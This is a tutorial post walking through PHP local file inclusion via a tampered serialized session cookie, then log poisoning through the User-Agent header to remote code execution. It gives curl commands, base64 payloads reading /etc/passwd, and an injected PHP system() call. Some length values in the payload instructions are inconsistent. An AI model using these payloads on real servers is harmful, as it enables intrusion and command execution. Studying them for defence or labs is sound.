Log Poisoning to Remote Code Execution | LFI | cUrl |
In this article, we will see how to perform Remote Code Execution through Log Poisoning which is a type of Local File Inclusion.
Let’s say there’s a web application using PHP as its backend language.
For this whole process, burp can be used but I’m going to use cUrl to send and receive responses and manipulate requests.
From the screenshot above, we can see the server is Nginx and the backend programming language is PHP.
Local File Inclusion in PHP
Local File inclusion is a very common web application vulnerability and it allows attackers to read sensitive files on the server and sometimes even execute remote commands. This happens when input is not validated properly or code is written poorly.
From screenshot 1 we can see that the web application contains a cookie named PHPSESSID and its value is encoded in base64. After decoding the base64 value of the cookie we found a serialized string.
O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}There are some complex arrays with elements of more than one data type so to arrange them in series, PHP uses a function searealize() to convert them in formatted string. For example
<?php
$data = serialize(array("Cat", "Dogs", "Rabbit"));
echo $data;
?>The above PHP code will give result as:a:3:{i:0;s:3:”Cat”;i:1;s:4:”Dogs”;i:2;s:6:”Rabbit”;}
The decoded cookie data looks interesting as it points to an index.html path, maybe we can modify the path to something else and it will include any file that is present on the server that leads to local file inclusion.
Encode the below-modified path to base64 and send it to the application.
O:9:"PageModel":1:{s:4:"file";s:22:"../../../../etc/passwd";}
Command: curl -i -v {URL}-b "PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCI7fQ=="It Works! We can see the passwd file which confirms LFI vulnerability in this application.
Log Poisoning
A server log is a text file that contains all the activities that have been performed while communicating with the web server like files that were accessed, status codes, user-agent, location, IP, etc.
Log poisoning or Log injection is a technique that allows the attacker to tamper with the log file contents like inserting the malicious code to the server logs to execute commands remotely or to get a reverse shell. It will work only when the application is already vulnerable to LFI.
The PHP code includes file index.html from the include statement without proper input validation, so the inclusion of a malformed file would be evaluated. If we can control the contents of a file available on the vulnerable web application, we could insert PHP code and load the file over the LFI vulnerability to execute our code.
The contents that we can control are the logs that we are sending to the server.
In our case, the server is Nginx so the default path for logs is /var/log/nginx/access.log and it will differ according to different servers. Encoding and sending the below string gives us the logs of the server.
Note: Change the size to 34 for the particular string
O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}
Remote Code Execution
As the User-Agent header is being logged, we are going to change its value to a malicious PHP code and send it to the server.
RCE vulnerability allows an attacker to execute commands remotely on the victim system.
Below PHP function system() accepts a command as a parameter and displays its result as output.
<?php system('ls /'); ?>
Command: curl -i -v {URL} -A "<?php system('ls /'); ?>"-i include response
-v verbose
-A To provide the value of User-Agent
After the request is sent, the PHP code has been logged into the system and should be executed once we visit the access.log file.
Command: curl -i -v {URL} -b "PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQ=="
We can list all the directories present in the root directory and just like that any command can be executed on the target remotely.
Thank You for Reading.
Twitter: @medusa_0xf
